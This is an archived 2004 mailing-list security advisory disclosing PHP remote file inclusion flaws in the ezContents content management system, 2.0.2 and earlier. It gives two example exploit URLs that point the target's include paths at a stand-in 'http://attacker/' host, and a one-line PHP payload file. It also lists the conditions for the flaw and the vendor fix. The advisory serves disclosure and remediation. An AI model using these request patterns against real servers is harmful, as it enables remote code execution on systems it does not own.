[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040210232049.GA15962@netvigilance.com>
Date: Wed, 11 Feb 2004 00:20:49 +0100
From: Cedric Cochin <cco@...vigilance.com>
To: submissions@...ketstormsecurity.org, vuln@...unia.com,
news@...uriteam.com, bugtraq@...urityfocus.com,
bugs@...uritytracker.com
Subject: PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior
################################################################################
Summary :
ezContents a free open source content management system has been found to be
vulnerable to Multiple PHP Code Injection vulnerabilities. They enable a
malicious user to access arbitrary files or execute commands on the server.
################################################################################
Details :
Multiple PHP scripts can be exploited to perform PHP Code Injection.
Vulnerable Systems:
* ezContents 2.0.2 and prior
CVE :
CAN-2004-0132
Release Date :
February 11, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://attacker/
Will import the following file into the PHP code.
- --> http://attacker/include/adodb/adodb.inc.php
Attacker just has to create the file adodb.inc.php as :
<? print "<?phpinfo();exit?>"?>
Idem with
http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://attacker/&GLOBALS[gsLanguage]=ezContents
Will import the following file into the PHP code.
- --> http://attacker/ezContents/lang_admin.php
This vulnerability only applies when running ezContents on PHP version 4.3.0 or
above (prior versions did not support the inclusion of remote files); "URL
fopen wrappers" are enabled (the default); and with 'register_globals' set to
"On".
This vulnerability is present in a decent number of PHP files. The behavior of
version 2.0RC3 and 2.0.1 is approximatively the same. Some of the attack are
not working on the both due to different include() calls. (for example the
second one is not working on 2.0RC3 due to an additional "languages/" at the
beginning of the include call).
################################################################################
Vendor Status :
The information has been provided to ezContents Support Team.
A new release with fixes for these vulnerabilities is already available.
- --> http://www.ezcontents.org/forum/viewtopic.php?t=361
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
< cco at netvigilance dot com >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFAKWcjA9/8vqmWoYQRAkq6AJ9q00rfnDgZhxM+nc7CwkTserUSPQCglQ14
YpfZJvi3ulhpgu/r9dnEpF0=
=g3Xn
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists